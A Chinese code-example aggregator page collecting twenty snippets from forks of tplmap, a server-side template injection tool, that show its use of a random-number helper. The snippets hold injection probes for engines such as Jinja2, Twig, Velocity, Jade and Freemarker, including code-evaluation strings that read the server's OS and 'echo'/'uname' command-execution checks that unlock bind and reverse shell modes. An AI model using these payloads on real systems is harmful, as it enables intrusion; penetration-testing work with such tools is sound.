本文整理汇总了Python中utils.rand.randint_n函数的典型用法代码示例。如果您正苦于以下问题:Python randint_n函数的具体用法?Python randint_n怎么用?Python randint_n使用的例子?那么恭喜您, 这里精选的函数代码示例或许可以为您提供帮助。
在下文中一共展示了randint_n函数的20个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于我们的系统推荐出更棒的Python代码示例。
示例1: _detect_dust
def _detect_dust(self):
# Print what it's going to be tested
log.info('%s plugin is testing rendering' % (
self.plugin,
)
)
for prefix, suffix in self._generate_contexts():
payload = 'AA{!c!}AA'
header_rand = rand.randint_n(10)
header = str(header_rand)
trailer_rand = rand.randint_n(10)
trailer = str(trailer_rand)
if 'AAAA' == self.render(
code = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('header', '%s')
self.set('trailer', '%s')
self.set('prefix', prefix)
self.set('suffix', suffix)
self.set('engine', self.plugin.lower())
self.set('language', self.language)
return
开发者ID:epinna,项目名称:tplmap,代码行数:33,代码来源:dust.py
示例2: detect_engine
def detect_engine(self):
randA = rand.randint_n(1)
randB = rand.randint_n(1)
# {{7*'7'}} and a{#b#}c work in freemarker as well
payload = '{%% set a=%i*%i %%}{{a}}' % (randA, randB)
expected = str(randA * randB)
if expected == self.inject(payload):
self.set('language', 'php')
self.set('engine', 'twig')
开发者ID:5up3rc,项目名称:tplmap,代码行数:12,代码来源:twig.py
示例3: detect_exec
def detect_exec(self):
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('exec', True)
self.set('os', self.execute("uname"))
开发者ID:goryszewskig,项目名称:tplmap,代码行数:7,代码来源:velocity.py
示例4: rendered_detected
def rendered_detected(self):
randA = rand.randstr_n(2)
# Check this to avoid false positives
payload = 'p %s' % randA
expected = '<p>%s</p>' % randA
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate("""global.process.mainModule.require('os').platform()""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
开发者ID:GrayHats,项目名称:tplmap,代码行数:25,代码来源:jade.py
示例5: rendered_detected
def rendered_detected(self):
randA = rand.randstr_n(2)
randB = rand.randstr_n(2)
# Check this to avoid detecting Twig as Jinja2
payload = '{{"%s".join("%s")}}' % (randA, randB)
expected = randA.join(randB)
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate("""'-'.join([__import__('os').name, __import__('sys').platform])""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
开发者ID:CaineQT,项目名称:tplmap,代码行数:26,代码来源:jinja2.py
示例6: detect_engine
def detect_engine(self):
expected_rand = str(rand.randint_n(1))
payload = '#set($p=%(payload)s)\n$p\n' % ({ 'payload': expected_rand })
if expected_rand == self.inject(payload):
self.set('language', 'java')
self.set('engine', 'velocity')
开发者ID:goryszewskig,项目名称:tplmap,代码行数:8,代码来源:velocity.py
示例7: detect_engine
def detect_engine(self):
# TODO: remove this as already performed on discovery phase
expected_rand = str(rand.randint_n(1))
payload = '#set($p=%(payload)s)\n$p\n' % ({ 'payload': expected_rand })
if expected_rand == self.render(payload):
self.set('language', 'java')
self.set('engine', 'velocity')
开发者ID:xukaiyi,项目名称:tplmap,代码行数:9,代码来源:velocity.py
示例8: detect_engine
def detect_engine(self):
randA = rand.randint_n(1)
payload = '{{7*\'%s\'}}' % (randA)
expected = str(randA*7)
if expected == self.inject(payload):
self.set('language', 'python')
self.set('engine', 'twig')
开发者ID:LucaBongiorni,项目名称:tplmap,代码行数:10,代码来源:twig.py
示例9: blind_detected
def blind_detected(self):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
if self.execute_blind('echo %s' % str(rand.randint_n(2))):
self.set('execute_blind', True)
self.set('write', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
开发者ID:CaineQT,项目名称:tplmap,代码行数:10,代码来源:nunjucks.py
示例10: _detect_render
def _detect_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.info('%s plugin is testing rendering with tag %s' % (
self.plugin,
repr(render_action.get('render') % ({'code' : '*' })),
)
)
for prefix, suffix in self._generate_contexts():
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })
header_rand = rand.randint_n(10)
header = render_action.get('header') % ({ 'header' : header_rand })
trailer_rand = rand.randint_n(10)
trailer = render_action.get('trailer') % ({ 'trailer' : trailer_rand })
# First probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.render(
code = payload,
header = header,
trailer = trailer,
header_rand = header_rand,
trailer_rand = trailer_rand,
prefix = prefix,
suffix = suffix
):
self.set('render', render_action.get('render'))
self.set('header', render_action.get('header'))
self.set('trailer', render_action.get('trailer'))
self.set('prefix', prefix)
self.set('suffix', suffix)
return
开发者ID:CaineQT,项目名称:tplmap,代码行数:42,代码来源:plugin.py
示例11: detect_eval
def detect_eval(self):
expected_rand = str(rand.randint_n(1))
payload = """print('%s');""" % expected_rand
result_php_tag = self.evaluate(payload)
# If {php} is sent back means is in secure mode
if expected_rand == result_php_tag:
self.set('evaluate', 'php')
self.set('os', self.evaluate('echo PHP_OS;'))
开发者ID:xukaiyi,项目名称:tplmap,代码行数:11,代码来源:smarty.py
示例12: render
def render(self, code, **kwargs):
header_rand = kwargs.get('header_rand', self.get('header_rand', rand.randint_n(10)))
header = kwargs.get('header', self.get('header', '%(header)s') % ({ 'header' : header_rand }))
trailer_rand = kwargs.get('trailer_rand', self.get('trailer_rand', rand.randint_n(10)))
trailer = kwargs.get('trailer', self.get('trailer', '%(trailer)s') % ({ 'trailer' : trailer_rand }))
prefix = kwargs.get('prefix', self.get('prefix', ''))
suffix = kwargs.get('suffix', self.get('suffix', ''))
blind = kwargs.get('blind', False)
injection = header + code + trailer
# Save the average HTTP request time of rendering in order
# to better tone the blind request timeouts.
result_raw = self.inject(
code = injection,
prefix = prefix,
suffix = suffix,
blind = blind
)
if blind:
return result_raw
else:
result = None
# Return result_raw if header and trailer are not specified
if not header and not trailer:
return result_raw
# Cut the result using the header and trailer if specified
if header:
before,_,result_after = result_raw.partition(str(header_rand))
if trailer and result_after:
result,_,after = result_after.partition(str(trailer_rand))
return result.strip() if result else result
开发者ID:CaineQT,项目名称:tplmap,代码行数:40,代码来源:plugin.py
示例13: _detect_unreliable_render
def _detect_unreliable_render(self):
render_action = self.actions.get('render')
if not render_action:
return
# Print what it's going to be tested
log.debug('%s plugin is testing unreliable rendering on text context' % (
self.plugin
)
)
# Prepare base operation to be evalued server-side
randA = rand.randint_n(1)
randB = rand.randint_n(1)
expected = str(randA*randB)
payload = render_action.get('render') % ({ 'code': '%s*%s' % (randA, randB) })
# Probe with payload wrapped by header and trailer, no suffex or prefix
if expected == self.render(
code = payload,
header = '',
trailer = '',
header_rand = None,
trailer_rand = None,
prefix = '',
suffix = ''
):
self.set('render', render_action.get('render'))
# Print if the first found unreliable renode
if not self.get('unreliable'):
log.info('%s plugin has detected unreliable rendering with tag %s, skipping' % (
self.plugin,
repr(self.get('render') % ({'code' : '*' })))
)
self.set('unreliable', self.plugin)
return
开发者ID:CaineQT,项目名称:tplmap,代码行数:40,代码来源:plugin.py
示例14: blind_detected
def blind_detected(self):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
# Blind has been detected so code has been already evaluated
self.set('evaluate_blind', self.language)
if self.execute_blind('echo %s' % str(rand.randint_n(2))):
self.set('execute_blind', True)
self.set('write', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
开发者ID:CaineQT,项目名称:tplmap,代码行数:13,代码来源:smarty.py
示例15: inject
def inject(self, payload, header = None, header_rand = None, trailer = None, trailer_rand = None, prefix = None, suffix = None):
header_rand = rand.randint_n(3) if header_rand == None else header_rand
header = self.get('header_tag', '%(header)s') % ({ 'header' : header_rand }) if header == None else header
trailer_rand = rand.randint_n(3) if trailer_rand == None else trailer_rand
trailer = self.get('trailer_tag', '%(trailer)s') % ({ 'trailer' : trailer_rand }) if trailer == None else trailer
prefix = self.get('prefix', '') if prefix == None else prefix
suffix = self.get('suffix', '') if suffix == None else suffix
injection = prefix + header + payload + trailer + suffix
result = self.channel.req(injection)
log.debug('[request %s]\n > %s\n < %s' % (self.plugin, injection.replace('\n', '\n > '), result.replace('\n', ' \n < ')) )
# Cut the result using the header and trailer if specified
if header:
before,_,result = result.partition(str(header_rand))
if trailer:
result,_,after = result.partition(str(trailer_rand))
return result.strip()
开发者ID:5up3rc,项目名称:tplmap,代码行数:22,代码来源:check.py
示例16: inject
def inject(self, payload, header = None, header_rand = None, trailer = None, trailer_rand = None, prefix = None, suffix = None):
header_rand = rand.randint_n(10) if header_rand == None else header_rand
header = self.get('header_fmt', '%(header)s') % ({ 'header' : header_rand }) if header == None else header
trailer_rand = rand.randint_n(10) if trailer_rand == None else trailer_rand
trailer = self.get('trailer_fmt', '%(trailer)s') % ({ 'trailer' : trailer_rand }) if trailer == None else trailer
prefix = self.get('prefix', '') if prefix == None else prefix
suffix = self.get('suffix', '') if suffix == None else suffix
injection = prefix + header + payload + trailer + suffix
log.debug('[request %s] %s' % (self.plugin, repr(self.channel.url)))
result_raw = self.channel.req(injection)
result = None
# Cut the result using the header and trailer if specified
if header:
before,_,result_after = result_raw.partition(str(header_rand))
if trailer and result_after:
result,_,after = result_after.partition(str(trailer_rand))
return result.strip() if result else result
开发者ID:goryszewskig,项目名称:tplmap,代码行数:24,代码来源:plugin.py
示例17: rendered_detected
def rendered_detected(self):
self.set("engine", self.plugin.lower())
self.set("language", self.language)
os = self.render("""<% import sys, os; x=os.name; y=sys.platform; %>${x}-${y}""")
if os and re.search("^[\w-]+$", os):
self.set("os", os)
self.set("evaluate", self.language)
self.set("write", True)
self.set("read", True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute("echo %s" % expected_rand):
self.set("execute", True)
self.set("bind_shell", True)
self.set("reverse_shell", True)
开发者ID:Rainism,项目名称:tplmap,代码行数:17,代码来源:mako.py
示例18: rendered_detected
def rendered_detected(self):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
os = self.evaluate("""global.process.mainModule.require('os').platform()""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
self.set('evaluate', self.language)
self.set('write', True)
self.set('read', True)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
开发者ID:CaineQT,项目名称:tplmap,代码行数:17,代码来源:nunjucks.py
示例19: rendered_detected
def rendered_detected(self):
payload = "#* comm *#"
if "" == self.render(payload):
# Since the render format is pretty peculiar assume
# engine name if render has been detected.
self.set("engine", self.plugin.lower())
self.set("language", self.language)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute("echo %s" % expected_rand):
self.set("execute", True)
os = self.execute("""uname""")
if os and re.search("^[\w-]+$", os):
self.set("os", os)
开发者ID:Rainism,项目名称:tplmap,代码行数:18,代码来源:velocity.py
示例20: rendered_detected
def rendered_detected(self):
randA = rand.randstr_n(1)
randB = rand.randstr_n(1)
payload = '%s<#--%s-->%s' % (randA, rand.randstr_n(1), randB)
expected = randA + randB
if expected == self.render(payload):
self.set('engine', self.plugin.lower())
self.set('language', self.language)
expected_rand = str(rand.randint_n(2))
if expected_rand == self.execute('echo %s' % expected_rand):
self.set('execute', True)
self.set('write', True)
self.set('read', True)
self.set('bind_shell', True)
self.set('reverse_shell', True)
os = self.execute("""uname""")
if os and re.search('^[\w-]+$', os):
self.set('os', os)
开发者ID:CaineQT,项目名称:tplmap,代码行数:23,代码来源:freemarker.py
注:本文中的utils.rand.randint_n函数示例由纯净天空整理自Github/MSDocs等源码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。 |
请发表评论